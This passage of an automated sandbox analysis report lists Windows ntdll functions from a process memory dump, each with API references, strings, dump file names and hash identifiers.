                                                • Opcode Fuzzy Hash: d7d6b927e8583a989a66fe995839b839405e70240cfedc1bcf7e93462d8b6e7f
                                                • Instruction Fuzzy Hash: D471CF75A0030A9FDB84DFB8C988ABEB7F4FF84314F14842DE406AB291E735A941CB51
                                                Function 1FE48927 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 187timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlDebugPrintTimes.NTDLL ref: 1FE48B03
                                                • RtlDebugPrintTimes.NTDLL ref: 1FE48B5B
                                                  • Part of subcall function 1FDB2B60: LdrInitializeThunk.NTDLL ref: 1FDB2B6A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes$InitializeThunk
                                                • String ID: $File
                                                • API String ID: 1259822791-2412145507
                                                • Opcode ID: a473a706edcb05ff12cb24573700f4b3fad2ebd3e76d222667307ec7c700f935
                                                • Instruction ID: aa4febdcf7a424d3df8d1b66763f0b3742610219dd183807d40e993466c1c1ac
                                                • Opcode Fuzzy Hash: a473a706edcb05ff12cb24573700f4b3fad2ebd3e76d222667307ec7c700f935
                                                • Instruction Fuzzy Hash: 0061B131A1022C9BDF66CF24DC41BEDB7B8AB08714F1045ADE509E6191EB70AF80CF64
                                                Function 1FDAC720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 1FDE82E8
                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 1FDE82DE
                                                • Failed to reallocate the system dirs string !, xrefs: 1FDE82D7
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                • API String ID: 3446177414-1783798831
                                                • Opcode ID: 0289e0f90c950687a1ae9c521571c4ceb673dac839e3840bb29667ccfbf40ede
                                                • Instruction ID: 13b054223a7af55b4a34f82ba19477faafbef533fbfd57f839bbe667ae69b2ae
                                                • Opcode Fuzzy Hash: 0289e0f90c950687a1ae9c521571c4ceb673dac839e3840bb29667ccfbf40ede
                                                • Instruction Fuzzy Hash: 824102B5554314ABC790EB74DD84BAF77E8AB45730F00052AF845D7290EB36F800CBA5
                                                Function 1FDABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Resource at %p, xrefs: 1FDE7B8E
                                                • RTL: Re-Waiting, xrefs: 1FDE7BAC
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 1FDE7B7F
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 0-871070163
                                                • Opcode ID: ab3a72e3a59edf6d4e5a00a001a151c2bf026550322b1c9ac030e3d64a66b00d
                                                • Instruction ID: 2b7c6cd667a0f155a97a3c84bfa762b14e64b1f8d9f009ccf6425801adef939b
                                                • Opcode Fuzzy Hash: ab3a72e3a59edf6d4e5a00a001a151c2bf026550322b1c9ac030e3d64a66b00d
                                                • Instruction Fuzzy Hash: F841C0357007429FC790CE25C840B6AB7E5EF88720F150A1DE996DB680DB32F906CB95
                                                Function 1FDAB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1FDE728C
                                                Strings
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 1FDE7294
                                                • RTL: Resource at %p, xrefs: 1FDE72A3
                                                • RTL: Re-Waiting, xrefs: 1FDE72C1
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                • Opcode ID: 58078829759839c751f8f946d7937dd1092bef645e3e7ea7d3a7c0c3a44f5414
                                                • Instruction ID: 3d02ee7806c3f1c91d7539123f3f29130bed9d4c82e976e4143c4bc22ae01c61
                                                • Opcode Fuzzy Hash: 58078829759839c751f8f946d7937dd1092bef645e3e7ea7d3a7c0c3a44f5414
                                                • Instruction Fuzzy Hash: 3841F235600306ABC791CE24CC41F7AB7A5FF44714F150A19F8A5EB281DB22F806C7E5
                                                Function 1FDF4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • LdrpCheckRedirection, xrefs: 1FDF488F
                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1FDF4888
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 1FDF4899
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 3446177414-3154609507
                                                • Opcode ID: 8bfd38eb9b7a6b9e34c40dedbcd58af91dc3f3fee39f7175d06e585d87c71dc1
                                                • Instruction ID: 0fc4031a205dd562dcd285475df371a0a563bac08c89f27913d5336aeaff490d
                                                • Opcode Fuzzy Hash: 8bfd38eb9b7a6b9e34c40dedbcd58af91dc3f3fee39f7175d06e585d87c71dc1
                                                • Instruction Fuzzy Hash: 1841A176A213919BCB91DF68C840E6677E4AF4B760F030659EC989B361E721F902CBD1
                                                Function 1FE22300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: 7009fe6b73b93e6e8e418ec6dd4240cdf92bc3126561f0602e6f83a1df99e1dd
                                                • Instruction ID: 08ac77deeb46630d4549fbab673ad40f51deafe16bf8e907e85bff4de01b2d5c
                                                • Opcode Fuzzy Hash: 7009fe6b73b93e6e8e418ec6dd4240cdf92bc3126561f0602e6f83a1df99e1dd
                                                • Instruction Fuzzy Hash: 3D317876A102199FDB50CF29CC80BFE77F8EF44614F85459AE849E3240FB31BA559BA0
                                                Function 1FDF5F10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Wow64 Emulation Layer
                                                • API String ID: 3446177414-921169906
                                                • Opcode ID: 4454d2d3c07b1b582d96145a1f7a6e6f0ef969bb2b872bace6012f270cddf44d
                                                • Instruction ID: 2f151c91ee8e4550190cae4fd9433cbf7aa43f6dbee32280d882f1f416e35d79
                                                • Opcode Fuzzy Hash: 4454d2d3c07b1b582d96145a1f7a6e6f0ef969bb2b872bace6012f270cddf44d
                                                • Instruction Fuzzy Hash: D1215E7561021DBFEF419AA0CC88DFF7B7DEF452A8B120154FA15A2140EA34AF059B70
                                                Function 1FE47CD6 Relevance: 6.4, APIs: 4, Instructions: 397timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: 11ddf6df07c12d5ac6997a8bc11d782affc8724f985895d2c34ebf40ffc82559
                                                • Instruction ID: e8fe0b2aa61ddce5bf45c060e832ddcdb0e2e8f8b052502c99038de1aae39d4b
                                                • Opcode Fuzzy Hash: 11ddf6df07c12d5ac6997a8bc11d782affc8724f985895d2c34ebf40ffc82559
                                                • Instruction Fuzzy Hash: 79E14171E50309ABDF15CFA4D881BEEBBB5BF44314F20852EE515EB280E774AA45CB90
                                                Function 1FD9EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 161a5932536e8d4368b0229fd1ec66a0770027f07028e7e7b824190fa2a59719
                                                • Instruction ID: 43d7594fe7558ea8f75c012133a5d12f567c57a83067a308261fd9b6ce0ba277
                                                • Opcode Fuzzy Hash: 161a5932536e8d4368b0229fd1ec66a0770027f07028e7e7b824190fa2a59719
                                                • Instruction Fuzzy Hash: 36E1E275D00748DFCB61CFE9C980AADBBF5BF48314F2046AAE456AB260D771A942CF50
                                                Function 1FDEEF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: c7120ce1ffe3b330cfbf392c114e006e41b08d040bd4e923c4e6dcee280cb436
                                                • Instruction ID: 083a1cd0a0395391b8662e5394a252dd5f994479cc2deec63949b65acc6dde00
                                                • Opcode Fuzzy Hash: c7120ce1ffe3b330cfbf392c114e006e41b08d040bd4e923c4e6dcee280cb436
                                                • Instruction Fuzzy Hash: 48714872E002199FDF45CFA4C980BEDBBB5BF48310F15416AE905FB255E734A906CBA0
                                                Function 1FE4A4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: 156a205b7669ec4e1350861ac54fbba889a91908452b965e0441ff8236c40bcf
                                                • Instruction ID: 69a7c2a8dd52738ee18f606630f5084e9c59ac00f5cc7e41b7992fa87c042d21
                                                • Opcode Fuzzy Hash: 156a205b7669ec4e1350861ac54fbba889a91908452b965e0441ff8236c40bcf
                                                • Instruction Fuzzy Hash: B7517D717006129FDB08CE68E6A4A5977F1FF8AB24B2141ADD916CB750DB78FC51CB80
                                                Function 1FDEF1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: 67d36b0373afdbbef3f64787624ceadfd2781c7de1fb38e3b9f652ba5bb226b7
                                                • Instruction ID: 558a138c76a1ac00aa11eda1f5e297fa3449f7bbfd90b48129934171697854cf
                                                • Opcode Fuzzy Hash: 67d36b0373afdbbef3f64787624ceadfd2781c7de1fb38e3b9f652ba5bb226b7
                                                • Instruction Fuzzy Hash: B2514676E00219DFDF45CFA4C844AEDBBB1BF48354F15816AE815BB291E735A902CF60
                                                Function 1FDA7B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                • String ID:
                                                • API String ID: 4281723722-0
                                                • Opcode ID: 33128a0e440bb5a9b09023831945e9f37249df55e231ff95389b4f99ddd40148
                                                • Instruction ID: 3575045fc8d39651d581ace45f9dd78d8253ab0e87e9d7df7a90b1235098e59a
                                                • Opcode Fuzzy Hash: 33128a0e440bb5a9b09023831945e9f37249df55e231ff95389b4f99ddd40148
                                                • Instruction Fuzzy Hash: 4D310979E006289FCF55DFA8D889AAEBBF1FB49330F20452AE411B7290DB356900CF54
                                                Function 1FDB7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                • Instruction ID: f45f670404f7afd9b1ce382669335e99d2bdc26e7c63c6de1110ab9a194c48e8
                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                • Instruction Fuzzy Hash: 0791A574E003069FDB90CE65C8816BEB7A1AF4A761F5A471EE857EB2C0E734A9418724
                                                Function 1FDA4C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0$Flst
                                                • API String ID: 0-758220159
                                                • Opcode ID: 5878e622113726bf6fbea9f0d6c393fee6de0600d15b4328e728c531729f25f2
                                                • Instruction ID: aac158a20bd9f0b60687f74bf89f326b1c0bde3cd0294447ef3b9a85f59266ad
                                                • Opcode Fuzzy Hash: 5878e622113726bf6fbea9f0d6c393fee6de0600d15b4328e728c531729f25f2
                                                • Instruction Fuzzy Hash: 4E519CB1A003998FCF55CFA9C4846ADFBF4EF46314F15802ED0599F2A1EB72A941CB84
                                                Function 1FE2EE6D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 155timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: HEAP: $ocessId
                                                • API String ID: 3446177414-3062389070
                                                • Opcode ID: c7d2e04d187efc1ab05b526ad4fb783b20d70eb55488d94469cd9d09b5e00cba
                                                • Instruction ID: 761aa7dd8a2fe204cf9e90a0d4bf9af317e9885a68e411bf9bbdd9b68d9492d6
                                                • Opcode Fuzzy Hash: c7d2e04d187efc1ab05b526ad4fb783b20d70eb55488d94469cd9d09b5e00cba
                                                • Instruction Fuzzy Hash: 535192719083929FD315CF28C840B5FBBE5BF88768F444A2EF59493290E770EA45CB92
                                                Function 1FD704E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1FD7063D
                                                • kLsE, xrefs: 1FD70540
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                • API String ID: 3446177414-2547482624
                                                • Opcode ID: 42867352495f895f20ffb8b368a3aa8d4ea32ea8f30f1546657b484b6af7769c
                                                • Instruction ID: be88c41a8cec711d15e532d0135962930584fb2f7027ce48e1fb43265ddf3232
                                                • Opcode Fuzzy Hash: 42867352495f895f20ffb8b368a3aa8d4ea32ea8f30f1546657b484b6af7769c
                                                • Instruction Fuzzy Hash: 8651BF795047428BC354DF64C5486EBB7E4AF85318F004A3EE59E8B280EB30E545CFA1
                                                Function 1FDFCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                Download Yara Rule
                                                APIs
                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 1FDFCFBD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: CallFilterFunc@8
                                                • String ID: @$@4Cw@4Cw
                                                • API String ID: 4062629308-3101775584
                                                • Opcode ID: b8bab46f72cdc33c68a70823bd1fbd5543f587e132c94c5ef900b16b3a99f122
                                                • Instruction ID: f6eca005df769430779cd325819b6dab86ff70384dd037f966e9f1c90216d1d7
                                                • Opcode Fuzzy Hash: b8bab46f72cdc33c68a70823bd1fbd5543f587e132c94c5ef900b16b3a99f122
                                                • Instruction Fuzzy Hash: D7419EB5900358DFCB618FA5C840EBEBBB8FF45720F01412AE915DB294E735E902DB65
                                                Function 1FD6DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: 0$0
                                                • API String ID: 3446177414-203156872
                                                • Opcode ID: aa090bf02b3c265b9d07461a8b82fdf22007b0f1922f719f0b3bb915f0ef66b7
                                                • Instruction ID: a1a35b1541371ac0d1c892009d81d494cb3d0fa61a58943fde4726309b2f8b3d
                                                • Opcode Fuzzy Hash: aa090bf02b3c265b9d07461a8b82fdf22007b0f1922f719f0b3bb915f0ef66b7
                                                • Instruction Fuzzy Hash: C1416DB5608746AFC340CF28D494A6ABBE4BF89324F044A2EF588DB341D771E945CB96